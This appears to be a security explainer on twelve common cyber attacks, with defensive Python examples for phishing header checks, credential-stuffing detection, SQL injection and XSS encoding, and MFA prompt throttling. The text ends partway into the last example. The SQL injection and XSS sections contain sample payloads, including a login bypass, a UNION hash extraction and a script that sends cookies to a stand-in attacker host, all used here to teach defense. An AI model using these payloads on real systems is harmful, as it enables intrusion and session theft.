
The 12 Most Common Types of Cyber Security Attacks Today

There are many different types of attacks in cyber security, and network security teams must worry about all of them. While no organization can protect itself against every type of threat, a company is expected to demonstrate due diligence in protecting against the most common forms of cyber-attacks.

The bulk of cyber-attacks are no longer carried out by a lone hacker in their basement. Today, highly organized and well-financed organizations treat cyber security attacks as a business, and they have the means to launch attacks on organizations of every size and industry. With the cost of cybercrime expected to reach $10.5 trillion by 2025, the ability to protect your users and enterprise systems from both external attacks and insider threats is imperative. In fact, it has become a competitive advantage for some companies.

This article describes the 12 most common cyber threats today and provides cyber-attack examples.

1. Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) Attacks

Both denial-of-service and distributed denial-of-service attacks are malicious attempts to make a server, service or network resource unavailable to its intended users. The difference is that a DoS attack comes from a single source, while a DDoS attack is launched from many sources at once, often compromised machines distributed around the globe.

DoS and DDoS attacks do not seek unauthorized access; rather, they prevent genuine traffic from reaching its destination by overwhelming the target with garbage traffic that exhausts its network bandwidth, its connection state tables or its application resources. The motives range from knocking a competitor's website offline to extorting the victim into paying the adversaries to stop the attack. A DoS or DDoS attack can also serve as a distraction that keeps defenders busy while a different kind of attack is launched.

The amount of traffic generated by these attacks can be substantial. In 2018, GitHub withstood a DDoS attack for about 20 minutes in which it was pummeled by 1.35 terabits per second (Tbps) of traffic, the largest DDoS attack recorded at the time; the traffic was reflected and amplified off exposed memcached servers, so the attackers needed only a fraction of that bandwidth themselves. In November 2021, Microsoft reported mitigating a 3.47 Tbps attack against one of its Azure customers.

Defense Methods

Cyber criminals use several different DoS and DDoS techniques, and each calls for its own defenses. The most common include the following:

  • Botnets: DDoS attacks often rely on botnets, networks of compromised computers (called bots or zombie systems) that are controlled by malicious actors. Often the computers' owners do not even know their machines have become part of a botnet. Once an attacker controls the bots, they can be directed collectively against target systems, and the resulting traffic is designed to overwhelm the bandwidth or processing capacity of those systems.

Botnets can be difficult to trace because the machines being used are often in many different geographic locations. One way to curtail botnet attacks is to configure your firewalls to block traffic from countries or IP ranges that your organization does not serve, bearing in mind that this is only a partial measure: bots in regions you do serve, and spoofed source addresses, pass straight through. Other measures include rate limiting, traffic filtering, 24/7 monitoring, implementing web application firewalls (WAFs) and, for volumetric attacks, an upstream scrubbing or DDoS protection service with more capacity than the attacker can muster.

  • TCP SYN flood attack: The attacker exploits the state a server must hold during the TCP three-way handshake. The attacker's devices flood the target with SYN (connection request) packets, usually from spoofed source addresses, and never send the final ACK when the target replies with SYN-ACK. Each half-open connection occupies a slot in the target's (small) listen backlog until it times out, so the backlog fills and the server stops accepting new connections from legitimate clients.

One countermeasure is to enable SYN cookies on the server, which lets it answer SYNs without storing state until the handshake completes; most operating systems support this, and on Linux it is the net.ipv4.tcp_syncookies setting. Another is to put servers behind a firewall or load balancer that acts as a SYN proxy, completing the handshake on the server's behalf and only forwarding connections that prove genuine. Increasing the size of the connection backlog and decreasing the timeout for half-open connections also help, but on their own they only raise the bar.

  • Teardrop attack: The attacker splits packets into overlapping fragments. When the target system tries to reassemble them, it can crash or reboot due to the conflicting offsets.

Modern operating systems were patched against the classic Teardrop attack long ago, so the primary protection is to keep systems patched; at the perimeter, a firewall or IPS that drops malformed and overlapping IP fragments adds a second layer. The frequently repeated advice to disable SMBv2 and block ports 139 and 445 stems from a separate Windows SMB vulnerability and does nothing against the IP-level fragmentation attack itself, although blocking those ports from untrusted networks is sound practice regardless.

  • Smurf attack: This type of attack floods a target system with unwanted ICMP echo request packets, using a spoofed source IP address. The attacker sends these packets to a network’s broadcast address, causing all devices on the network to reply simultaneously to the target, overwhelming it and leading to a denial of service.

One way to protect your devices from this attack is to disable IP directed broadcasts on your routers, so that an echo request addressed to a network's broadcast address is dropped rather than delivered to every host (on Cisco IOS this is the no ip directed-broadcast interface setting, which has been the default for many years). Another is to configure end systems not to respond to ICMP echo requests sent to broadcast addresses (on Linux, net.ipv4.icmp_echo_ignore_broadcasts, which defaults to enabled). Because the attack relies on a spoofed source address, filtering packets whose source addresses could not legitimately originate inside your network (ingress filtering, BCP 38) also helps.

  • Ping of death attack: Like a Smurf attack, this attack uses ICMP, but here the ICMP echo request is sent as IP fragments that, when reassembled, exceed the protocol's maximum packet size of 65,535 bytes. A target that does not check for this overflows its reassembly buffer and can crash, freeze or reboot, leading to a denial of service.

Ping of death attacks can be blocked by using a firewall that checks the total size of fragmented IP packets before they reach the host, and any operating system patched since the late 1990s rejects the oversized packets itself.

2. Man-in-the-Middle (MitM) Attacks

In a MitM attack, a hacker secretly intercepts and potentially alters the communication between two parties, while tricking both parties into believing they’re communicating directly with each other. Goals can include stealing information or injecting malicious data.

For example, an attacker might set up a rogue wireless access point (WAP) that spoofs a legitimate WAP by using the same or a similar network name (SSID). Unsuspecting users connect to this rogue WAP thinking it’s a trusted network, and then all their wireless data traffic passes through the rogue access point. This enables the attacker to intercept, inspect and modify the data.

Two of the most common types of MitM attacks are:

  • Session hijacking: An attacker intercepts and takes over a user’s established session to gain unauthorized access to a server or web application. One common method is to use a packet sniffer to intercept communication between the user and the server. By capturing or predicting the session token, attackers can bypass authentication and impersonate the victim in order to access sensitive information or functions on the target system.
[Figure: Man-in-the-middle attack, stage 1]

The second diagram shows how the attacker could then launch a DoS attack to keep the victim's system offline and connect to the server using the hijacked session.

[Figure: Man-in-the-middle attack, stage 2]
  • IP spoofing: An attacker disguises their true source IP address to appear as a trusted entity. By manipulating packet headers, attackers can deceive systems into thinking a malicious packet is from a legitimate source, enabling them to gain access or launch DoS attacks on networks and services.

Defensive Measures

While there is no single technology or configuration to prevent all MitM attacks, there are some security measures organizations and individuals can take to protect themselves against these types of attacks. Best practices include the following:

  • Always use encrypted sites (HTTPS) instead of HTTP, and enable HTTP Strict Transport Security (HSTS) on your own sites so browsers refuse to fall back to plain HTTP.
  • Avoid using public Wi-Fi for sensitive tasks. If you must use it, always use a VPN.
  • Ensure websites present a valid SSL/TLS certificate, and train users never to click through certificate warnings, which are exactly what an interception attempt produces.
  • Configure servers for current protocol versions (TLS 1.2 or 1.3) and cipher suites, and disable obsolete ones such as SSLv3 and TLS 1.0.
  • Use MFA so that intercepted passwords alone are not enough, preferring phishing-resistant methods such as FIDO2 security keys, since a MitM that relays traffic in real time can relay a one-time code as well.

3. Phishing and Spear Phishing Attacks

Phishing attacks combine social engineering and technical trickery to send emails that appear to be from trusted sources, often to either glean personal information like login credentials or to deploy ransomware. Spear phishing is a targeted form of phishing attack in which hackers gather detailed information about a specific individual or organization in order to customize their messages and make the scam more convincing.

The email might urge the user to open an attachment that purports to be innocent but is actually infected with malware. Or it might try to deceive the recipient into visiting a fake website designed to look like their financial institution in order to capture their login credentials, or prompt them to download malicious software onto their computer. Phishing attacks are so prominent that 9 in 10 enterprises fell victim to some type of phishing attack in 2022.

One way that hackers make their phishing emails look legitimate is email spoofing: making the information in the "From" section of the email appear as if the email is coming from someone you know, such as your management or your partner company. For example, in a case reported in 2016, attackers spoofed the email account of the newly appointed CEO of Mattel Corporation in a spear phishing email to the CFO, who wired more than $3 million to a bank account in China. (Luckily, the company was able to reclaim the money.)

Defensive Measures

Because email remains the primary vector for cyberattacks, a robust email security solution is essential. However, no tool is foolproof, so the following supplementary measures are wise:

  • Provide all users with regular training on phishing attacks and broader cyber hygiene practices.
  • Teach users to examine email headers and check that the "Reply-To" and "Return-Path" fields align with the domain in the "From" address, and that the display name is not hiding an address at a different domain. Publish SPF, DKIM and DMARC records for your own domains and enforce DMARC on inbound mail, so that messages forging your domain in the From header are rejected before anyone has to inspect them.
  • Use sandboxing to test suspicious email in an isolated environment, opening attachments and following embedded links there rather than on a user's workstation.
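
To make the header check concrete, here is a small Python script, added for this article and not part of the original text or of any Netwrix product, that parses a message and reports whether Reply-To, Return-Path and the display name align with the From address. The two sample messages are constructed for the example, and the "last two labels" rule it uses for the registrable domain is a simplification (production code should consult the Public Suffix List).

```python
"""Flag mail whose Reply-To / Return-Path / display name do not align with From.

Added example for the header-alignment check above; it is not code from the
original article or from Netwrix. The two sample messages are constructed,
and the two-label approximation of a "registrable domain" is a simplification.
"""
import re
from email import message_from_string

# Loose address matcher, enough to pull addresses out of display names too.
ADDR_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def sender_address(header_value: str) -> str:
    """Return the address the mail system actually uses from a header value.

    If the header has an angle-bracket part, that is the real address; any
    address in the display name is decoration (or a spoofing attempt).
    """
    bracketed = re.search(r"<([^>]*)>", header_value)
    candidate = bracketed.group(1) if bracketed else header_value
    found = ADDR_RE.findall(candidate)
    return found[0].lower() if found else ""


def registrable_domain(address: str) -> str:
    """Approximate the registrable domain as the last two labels.

    Assumption for this example only: production code should use the Public
    Suffix List so that e.g. 'example.co.uk' is handled correctly.
    """
    domain = address.rpartition("@")[2].lower()
    labels = [label for label in domain.split(".") if label]
    return ".".join(labels[-2:])


def header_alignment_findings(raw_message: str) -> list[str]:
    """Return human-readable alignment problems; an empty list means aligned."""
    msg = message_from_string(raw_message)
    from_header = msg.get("From", "")
    from_domain = registrable_domain(sender_address(from_header))
    if not from_domain:
        return ["From header missing or unparseable"]

    findings = []
    for header in ("Reply-To", "Return-Path"):
        value = msg.get(header)
        if value is None:
            continue  # an absent header is not misalignment (Return-Path is usually added by the MTA)
        other = registrable_domain(sender_address(value))
        if other != from_domain:
            findings.append(f"{header} domain {other!r} does not match "
                            f"From domain {from_domain!r}")

    # Display-name spoofing: a different address is shown in the visible name,
    # e.g. From: "ceo@example.com" <ceo-office@examp1e-mail.net>
    shown = {registrable_domain(a) for a in ADDR_RE.findall(from_header)}
    decoys = shown - {from_domain}
    if decoys:
        findings.append(f"display name shows an address at {sorted(decoys)!r}, "
                        f"real sender domain is {from_domain!r}")
    return findings


def is_aligned(raw_message: str) -> bool:
    return not header_alignment_findings(raw_message)


# Constructed sample messages (not real mail).
LEGITIMATE_MESSAGE = """\
From: Alice Example <alice@example.com>
Reply-To: alice@mail.example.com
Return-Path: <bounces@example.com>
To: bob@example.com
Subject: Q3 figures

Figures attached as discussed.
"""

SPOOFED_MESSAGE = """\
From: "ceo@example.com" <ceo-office@examp1e-mail.net>
Reply-To: finance.desk@outlook-mailer.biz
Return-Path: <bounce@examp1e-mail.net>
To: cfo@example.com
Subject: Urgent wire transfer, I am in meetings all day

Please wire the attached invoice today.
"""

if __name__ == "__main__":
    for name, raw in (("legitimate", LEGITIMATE_MESSAGE), ("spoofed", SPOOFED_MESSAGE)):
        print(name, header_alignment_findings(raw) or "aligned")
```

A subdomain of the From domain (mail.example.com above) is treated as aligned, which mirrors DMARC's relaxed alignment; a mail gateway that wants strict alignment would compare the full domains instead.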

4. Drive-by Attacks

Drive-by cyberattacks compromise legitimate websites to redirect visitors to attacker-controlled pages that exploit vulnerabilities in the browser, its plugins or the operating system and silently download malware onto the device. All of this happens without any further action from the user, or even their knowledge.

In other words, merely visiting a website can get your device infected. As an example, an estimated 11,000 WordPress sites were found to be infected with an elusive strain of malware in 2023.

Defensive Measures

These attacks take advantage of outdated software or unpatched systems, so keep your operating systems, web browsers and browser plugins updated. In addition, users should stick to sites they normally use, and reduce the attack surface of their devices by removing unnecessary applications, browser plugins and extensions.

5. Password Attacks

Password attacks aim to gain unauthorized access to sensitive information and systems by compromising user passwords. Here are a few of the main attack types:

  • Password guessing attacks: There are many types of password guessing attacks. In a brute force attack, the attacker tries every possible password until the correct one is found, typically starting with the most commonly used passwords, which can compromise poorly protected accounts in seconds.
    A specialized brute-force option is a dictionary attack, which limits candidate passwords to words from a wordlist. Attackers can also build a more targeted list from what they learn about the user's life or interests. Password spraying reverses the approach: a handful of common passwords is tried against many accounts, which keeps each account below its lockout threshold.
  • Keyloggers: Hackers install software on a user's computer to record the user's keystrokes as they type the password. Researchers have also shown that machine-learning models can recover keystrokes from audio recordings of typing.
  • Credential stuffing: This form of password attack is so common that it merits its own section. We’ll tackle it next.

Defensive Measures

Passwords remain the most used mechanism to authenticate users, but the reality is, passwords alone are no longer sufficient to protect online accounts. It’s essential to adopt multifactor authentication, which combines at least two of the following: something you know (like a password), something you possess (such as a cellphone or FIDO key), and something inherent to you (like a fingerprint).

Organizations should also establish policies that lock accounts after several unsuccessful login attempts, with two caveats: an overly aggressive lockout lets an attacker lock legitimate users out at will, and spraying attacks deliberately stay below the threshold, so failures should also be counted per source address, not just per account. For optimal results, follow account lockout best practices.

6. Credential Stuffing Attacks

In this form of password attack, cybercriminals use usernames and passwords leaked in prior data breaches to gain access to accounts. These attacks bank on the fact that many people reuse passwords across multiple sites. For example, a hacker may obtain the login credentials of 50,000 users from a breach at one website. When they use these credentials to try to access popular platforms like PayPal.com or major banks, it is likely that a small fraction of those attempts will be successful.

Databases of compromised credentials are actively traded on the dark web; in fact, more than 24 billion username/password combinations are estimated to be in circulation. For example, in 2022, attackers attempted to log in to Norton Password Manager using 925,000 stolen credentials; they successfully compromised an undisclosed number of customer accounts.

Defensive Measures

The best defense against credential stuffing attacks is to educate users to use a unique password for every online account they use, and to make doing so easy by providing a high-quality password management solution.

In addition, if possible, make each person's username different from their email address, and screen new passwords against lists of passwords exposed in known breaches so that a password already in the attackers' hands cannot be chosen. Organizations should also require MFA to render compromised credentials useless on their own.
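
The following Python example, added here and not from the original article or any Netwrix product, illustrates the detection side of both the password-attack and the credential-stuffing sections: a per-account lockout rule that catches brute force against one user, and a per-source rule that catches credential stuffing (and password spraying), which evade account lockout by spreading failures across many users. The log format and log lines are constructed for the example, and the thresholds are illustrative.

```python
"""Separate brute-force lockout candidates from credential-stuffing sources.

Added example for the password-attack and credential-stuffing defenses above;
not code from the original article or from Netwrix. The log format and the
log lines are constructed for this example; real authentication logs differ.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth-(?P<outcome>ok|fail) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_events(lines):
    """Yield (timestamp, outcome, user, src) tuples, skipping lines that do not match."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
        yield ts, m["outcome"], m["user"], m["src"]


def accounts_to_lock(events, threshold=5, window=timedelta(minutes=15)):
    """Accounts with >= threshold failures inside any window: the classic lockout rule.

    It catches brute force against one account; it does NOT catch stuffing or
    spraying, which spread failures thinly across many accounts.
    """
    failures = defaultdict(list)
    for ts, outcome, user, _src in events:
        if outcome == "fail":
            failures[user].append(ts)
    locked = set()
    for user, times in failures.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                locked.add(user)
                break
    return locked


def suspicious_sources(events, min_distinct_users=10, window=timedelta(minutes=15)):
    """Sources that fail against many *different* accounts inside one window.

    Returns {src: peak number of distinct users failed within `window`}. This is
    the signature of credential stuffing (and of password spraying), which stay
    below the per-account lockout threshold by design.
    """
    by_src = defaultdict(list)
    for ts, outcome, user, src in events:
        if outcome == "fail":
            by_src[src].append((ts, user))
    flagged = {}
    for src, attempts in by_src.items():
        attempts.sort()
        in_window, left, peak = Counter(), 0, 0
        for ts, user in attempts:
            in_window[user] += 1
            while attempts[left][0] < ts - window:      # evict attempts older than the window
                old_user = attempts[left][1]
                in_window[old_user] -= 1
                if in_window[old_user] == 0:
                    del in_window[old_user]
                left += 1
            peak = max(peak, len(in_window))
        if peak >= min_distinct_users:
            flagged[src] = peak
    return flagged


def likely_compromised(events, flagged_sources):
    """Successful logins from a flagged source are the stuffing 'hits' to investigate."""
    return {(user, src) for _ts, outcome, user, src in events
            if outcome == "ok" and src in flagged_sources}


# Constructed sample log: 203.0.113.7 brute-forces alice; 198.51.100.23 tries one
# leaked password per account against 12 accounts and then gets in as user13.
SAMPLE_LOG = (
    [f"2024-05-02T10:00:{s:02d}Z auth-fail user=alice src=203.0.113.7" for s in range(1, 7)]
    + ["2024-05-02T10:01:00Z auth-fail user=bob src=192.0.2.10",
       "2024-05-02T10:01:20Z auth-fail user=bob src=192.0.2.10",
       "2024-05-02T10:01:40Z auth-ok user=bob src=192.0.2.10"]
    + [f"2024-05-02T10:05:{i:02d}Z auth-fail user=user{i:02d} src=198.51.100.23" for i in range(1, 13)]
    + ["2024-05-02T10:05:13Z auth-ok user=user13 src=198.51.100.23"]
)


def analyze(lines):
    events = list(parse_events(lines))
    flagged = suspicious_sources(events)
    return {"lock": accounts_to_lock(events),
            "stuffing_sources": flagged,
            "investigate": likely_compromised(events, flagged)}


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

Note that bob, who mistypes his password twice and then succeeds, trips neither rule, and that the stuffing source never exceeds one failure per account, so account lockout alone would have let it through.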

7. SQL Injection Attacks

SQL injection attacks consistently rank near the top of OWASP's top ten web application risks. These attacks exploit flaws in a website's code to insert malicious SQL into input fields or application queries. If the application builds queries by concatenating user input into the SQL text instead of passing it as parameters, an attacker can trick the database into executing unintended SQL commands, enabling them to read sensitive information, bypass authentication or even manipulate website content.

Defensive Measures

To defend against SQL injection attacks, ensure that all your SQL servers are updated and patched regularly, and employ the least-privilege model for database permissions so that the application's account can do only what the application needs. Use prepared statements (parameterized queries) for every query that involves user input; stored procedures help only if they do not themselves build dynamic SQL from their arguments. You should also validate input data against a whitelist at the application level as a second layer.
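
As an added example (not code from the original article or from Netwrix), the following Python snippet places a vulnerable login query beside its parameterized replacement, using an in-memory SQLite database with two constructed accounts. The password hashing is a deliberate placeholder, because the lesson is about the query rather than the hash; a real system would use a salted, slow KDF such as argon2 or bcrypt.

```python
"""SQL injection: a string-built query beside its parameterized replacement.

Added example for the SQL injection section above; not code from the original
article or from Netwrix. Uses an in-memory SQLite database with two constructed
accounts. hash_password() is a placeholder (real systems use a salted, slow KDF
such as argon2 or bcrypt), because the point here is the query, not the hash.
"""
import hashlib
import re
import sqlite3

# Allowlist for this example's usernames; defense in depth, not a substitute for parameters.
USERNAME_RE = re.compile(r"^[a-z0-9_.-]{1,32}$")


def hash_password(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()   # placeholder, see module docstring


def valid_username(username: str) -> bool:
    return bool(USERNAME_RE.match(username))


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [
        ("alice", hash_password("correct horse battery")),
        ("admin", hash_password("Sup3rSecret!")),
    ])
    return conn


def login_vulnerable(conn, username, password):
    """Untrusted input is pasted into the SQL text, so it can rewrite the query."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND pw_hash = '{hash_password(password)}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameters travel separately from the SQL text; the engine never parses them as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, hash_password(password)),
    ).fetchone()
    return row[0] if row else None


# Payload 1: close the string, then comment out the password check -> log in as admin.
BYPASS_PAYLOAD = "admin' --"
# Payload 2: UNION the admin's hash into the result column for offline cracking.
EXFIL_PAYLOAD = "' UNION SELECT pw_hash FROM users WHERE username = 'admin' --"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, bypass :", login_vulnerable(conn, BYPASS_PAYLOAD, "anything"))
    print("vulnerable, exfil  :", login_vulnerable(conn, EXFIL_PAYLOAD, "anything"))
    print("safe, bypass       :", login_safe(conn, BYPASS_PAYLOAD, "anything"))
    print("allowlist accepts? :", valid_username(BYPASS_PAYLOAD))
```

The same `admin' --` string that rewrites the vulnerable query is, in the parameterized version, simply a username nobody has, so the lookup returns nothing; the allowlist would have rejected it even earlier.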

8. Cross-Site Scripting (XSS) Attacks

Cross-site scripting attacks inject attacker-controlled script into web pages that the victim's browser trusts, so that the script runs in the victim's browser with the victim's session. In the stored (persistent) variant, the attacker submits a payload containing malicious JavaScript that the website saves in its database; when the victim requests a page, the website transmits the attacker's payload as part of the HTML body, and the victim's browser executes it. In the reflected variant the payload travels in a crafted link and is echoed back in the response, and in DOM-based XSS the page's own client-side code writes untrusted data into the document. For example, the script might send the victim's cookie to the attacker's server, allowing the attacker to use it for session hijacking. XSS can also be used to exploit additional vulnerabilities that enable an attacker to log keystrokes, capture screenshots, discover and collect network information, and remotely access and control the victim's machine.

The OWASP Top 10 (2021 edition) counted more than 274,000 occurrences of injection flaws, the category that includes SQL injection and cross-site scripting, in the applications it analyzed. The typical cross-site scripting attack process is outlined below.

[Figure: Cross-site scripting (XSS) attack]

Defensive Measures

Defending against cross-site scripting (XSS) attacks requires a combination of robust coding practices and security tools. Important best practices include the following:

  • Validate user input against what the field legitimately needs, but treat this as a secondary control: the decisive defense is encoding on output.
  • Encode untrusted data according to the context it is inserted into (HTML body, HTML attribute, JavaScript, URL) so the browser renders it as text rather than executing it.
  • Set the HttpOnly flag on session cookies so a script that does slip through cannot read them, and deploy a Content Security Policy to restrict where scripts may be loaded from.
  • Ensure all web and server software is regularly patched and updated.
  • Use automated tools to scan for vulnerabilities and conduct periodic penetration testing to identify potential risks.
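
Because the right encoding depends on where the data lands, here is an added Python example (not from the original article or from Netwrix) that renders the same untrusted string into HTML text, an attribute, a script block and a URL, beside the vulnerable version. The cookie-stealing payload is constructed for the example, and the page fragments are illustrative templates rather than any real framework's output.

```python
"""Context-aware output encoding for untrusted data in HTML.

Added example for the XSS section above; not code from the original article or
from Netwrix. The payloads are constructed; the page fragments are illustrative
templates, not a real framework's.
"""
import html
import json
from urllib.parse import quote

# Constructed payload: the cookie-stealing script the section describes.
COOKIE_THIEF = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"


def render_vulnerable(comment: str) -> str:
    """Untrusted text dropped straight into the HTML body: stored or reflected XSS."""
    return f'<p class="comment">{comment}</p>'


def render_html_text(comment: str) -> str:
    """HTML body context: escape & < > " ' so the browser shows text, not markup."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attribute(value: str) -> str:
    """Quoted attribute context: the same escaping stops a '" onmouseover=...' breakout."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def render_js_data(value) -> str:
    """Script context: JSON-encode, then neutralise < > & so '</script>' cannot close the block."""
    encoded = (json.dumps(value)
               .replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026"))
    return f"<script>var userData = {encoded};</script>"


def render_link(query: str) -> str:
    """URL query context: percent-encode; never let untrusted data choose the scheme or host."""
    return f'<a href="/search?q={quote(query, safe="")}">search</a>'


if __name__ == "__main__":
    print(render_vulnerable(COOKIE_THIEF))          # script tag survives: browser runs it
    print(render_html_text(COOKIE_THIEF))           # &lt;script&gt;...: browser shows text
    print(render_attribute('" onmouseover="alert(1)'))
    print(render_js_data("</script><script>alert(1)</script>"))
    print(render_link("javascript:alert(1)"))
```

Note that one encoder does not fit all contexts: HTML escaping inside a script block would leave `</script>` intact, and JSON encoding inside an attribute would leave the quote that ends the attribute. Pick the encoder for the slot the data goes into.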

9. Malware Attacks

Malware is any form of malicious software. Malware can be introduced to a system through various means, including email attachments, software downloads, USB sticks, malicious websites and legitimate websites that have been compromised. Once a single system is infected, malware can propagate through the network to infect more network-connected servers and devices, and it can slow the infected computer by consuming system resources.

Some of the most common types of malware today include the following:

  • Virus: A virus is a piece of code that attaches itself to legitimate software and propagates to other programs and files on the same system once executed. Once activated, it can corrupt data, degrade system performance, and perform other malicious activities.
  • Polymorphic virus: This type of virus changes its code or appearance each time it infects a new host, making detection by signature-based antivirus solutions more challenging. Its core functionality remains intact through the changes.
  • Worm: This standalone malware replicates itself without human intervention and spreads to other computers, often by exploiting vulnerabilities in software.
  • Trojan: Trojans are malicious programs disguised as legitimate software. Once activated, they can give an attacker control over the victim’s computer and funnel in other instances of malware. It is estimated that trojans represent 58% of all computer malware.
  • Rootkit: This stealthy software is designed to gain access to a computer system while hiding its presence. Once installed, it grants attackers full control, allowing for data theft or system manipulation. Rootkits often evade detection by standard antivirus tools.
  • Keylogger: As mentioned earlier, keyloggers are deposited on computer systems to capture keystrokes and obtain user passwords.
  • Spyware and adware: These forms of malware are used to monitor user activity and collect personal information and other sensitive data.
  • Ransomware: Because this form of malware is increasingly common and damaging, it is covered in its own section below.

Defensive Measures

The primary way to secure computers against malware is to use a modern endpoint security solution. Unlike traditional tools, which rely on signature-based malware identification, today's endpoint detection and response (EDR) products combine signatures with behavioral and heuristic analysis to catch anomalous activity, including polymorphic code that no signature matches.

Organizations can also implement firewalls that analyze and filter traffic to discover and block potentially harmful code before it infiltrates the network.

10. Ransomware

Ransomware is perhaps the biggest global cyber threat today. Ransomware cost the world more than $20 billion in 2021 and that figure is expected to grow to $261 billion by 2031.

Ransomware is malicious software that encrypts a victim’s data and systems to render them inaccessible. The attacker then demands a ransom from the victim, typically in cryptocurrency, for the decryption key to restore access. While federal law enforcement discourages paying these ransoms, businesses often do so to get their operations back online as quickly as possible. Ransomware gangs often also attempt to encrypt the organization’s backups so they cannot be used to restore systems and data.

As an additional form of extortion, many ransomware attackers exfiltrate a company's data before encrypting it and threaten to release or sell the data unless the ransom is paid. That way, even an organization that can restore its data from backups still faces pressure to pay.

Defensive Measures

Ransomware attacks are challenging to defend against due to their increasing variety and sophistication. Indeed, there is no one way to prevent a ransomware attack. It requires a multi-layer security strategy that incorporates multiple security measures, including the following:

  • Back up critical data and systems frequently, store the backups where they are not directly accessible from the main network (offline or immutable storage), and test restores regularly; a backup that has never been restored is an assumption, not a control.
  • Segment the network. If malware enters one portion of the network, VLAN segmentation can contain it while incident response and recovery operations are underway.
  • Enforce the principle of least privilege by limiting user rights, granting administrative access only when necessary and just in time (JIT), and eliminating standing privilege wherever possible.
  • Use intrusion detection systems and regularly audit your networks for signs of unusual activity, such as mass file renames or encryption, access to backup systems and the large outbound transfers that precede the ransom note.


11. Zero-Day Attacks

A zero-day attack exploits a software vulnerability that’s unknown to its vendor and the broader security community. Since there’s no prior knowledge of the vulnerability, there’s often no specific defense or patch in place when the attack occurs. This gives developers zero days to address the issue before it’s exploited.

Defensive Measures

Since zero-day attacks exploit vulnerabilities nobody has yet catalogued, regular patching cannot stop the initial exploit, although rapid patching still shortens the window once a fix ships and hardened configurations often blunt an exploit's impact. Focus on a defense-in-depth cybersecurity posture that includes effective monitoring of your IT estate, threat intelligence, network segmentation, application whitelisting, least privilege and anomaly detection, so that an exploit you could not prevent is still detected and contained.

12. Compromise of One-Time Codes used in MFA

Organizations are rapidly adopting multifactor authentication (MFA) not just for privileged access but for all users. Indeed, the global MFA market is projected to grow from $11.1 billion in 2021 to more than $23 billion by 2026.

One of the most common authentication methods in MFA is one-time codes sent to a user through SMS or an authentication app. Unfortunately, these codes can be compromised in several ways. In particular, attackers can:

  • Exploit weaknesses in the mobile communication infrastructure, such as the SS7 signaling protocols used between carriers, or use malware to read SMS messages directly from a user's device.
  • Trick users into providing their one-time codes through deceptive websites or emails that mimic legitimate services.
  • Convince a user’s mobile carrier to switch their phone number to a new SIM card so the attacker will receive the one-time codes sent via SMS. This technique is called SIM swapping.

Instead of intercepting one-time codes, some cybercriminals exploit MFA fatigue. Users are so inundated by MFA prompts that they feel overwhelmed, so when a hacker logs on with compromised credentials and triggers prompt after prompt, the user may simply approve one to make them stop, without realizing it is not legitimate. As a result, the hacker is authenticated.

Defensive Measures

There are multiple ways to strengthen your MFA procedures. One is to limit the number of MFA prompts sent to a given user account within a given timeframe, since a burst of prompts is a sign of malicious access attempts, and to alert on it. In addition, educate users to view unexpected MFA prompts with suspicion and to report them rather than approve them. Finally, consider replacing simple approve/deny push notifications with methods that are harder to abuse, such as number matching (the user must type a number shown on the login screen, so an approval cannot be given blindly) or phishing-resistant FIDO2/WebAuthn authenticators, which are bound to the legitimate site and produce no code that can be relayed.
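
One way to implement the prompt limit is the small Python throttle below, added for this article and not from the original text or any Netwrix product. It allows a few unanswered pushes per user within a window, then suspends pushes for a cooldown period, falls back to a typed code and raises an alert. The thresholds and the fallback behaviour are this example's assumptions, and time is passed in explicitly so the behaviour is deterministic.

```python
"""Throttle MFA push prompts so an attacker cannot spam a user into approving.

Added example for the MFA-fatigue defenses above; not code from the original
article or from Netwrix. Thresholds and fallback behaviour are this example's
assumptions; timestamps are passed in explicitly so runs are deterministic.
"""
from collections import defaultdict, deque


class PushPromptThrottle:
    """Allow at most `max_prompts` unanswered pushes per user per `window_seconds`.

    Beyond that, stop sending pushes for `cooldown_seconds`, make the user type a
    code from the authenticator app instead (an attacker holding only the
    password cannot do that), and record an alert for the security team.
    """

    def __init__(self, max_prompts=3, window_seconds=600, cooldown_seconds=3600):
        self.max_prompts = max_prompts
        self.window = window_seconds
        self.cooldown = cooldown_seconds
        self._pending = defaultdict(deque)   # user -> times of unanswered prompts
        self._blocked_until = {}             # user -> time when pushes resume
        self.alerts = []

    def request_prompt(self, user: str, now: float, src_ip: str) -> str:
        """Return 'push' to send a push, or 'require_code' to fall back to a typed code."""
        if self._blocked_until.get(user, 0) > now:
            return "require_code"
        pending = self._pending[user]
        while pending and pending[0] <= now - self.window:
            pending.popleft()                # forget prompts that fell out of the window
        if len(pending) >= self.max_prompts:
            self._blocked_until[user] = now + self.cooldown
            pending.clear()
            self.alerts.append(f"{user}: {self.max_prompts} unanswered MFA pushes within "
                               f"{self.window}s from {src_ip}; pushes suspended")
            return "require_code"
        pending.append(now)
        return "push"

    def record_response(self, user: str, approved: bool, now: float) -> None:
        """A real user answering (approve or deny) resets the unanswered count.

        An explicit denial means someone is logging in with the user's password,
        so it is worth an alert on its own.
        """
        self._pending[user].clear()
        if not approved:
            self.alerts.append(f"{user}: denied an MFA push at t={now}; check for credential compromise")


if __name__ == "__main__":
    throttle = PushPromptThrottle()
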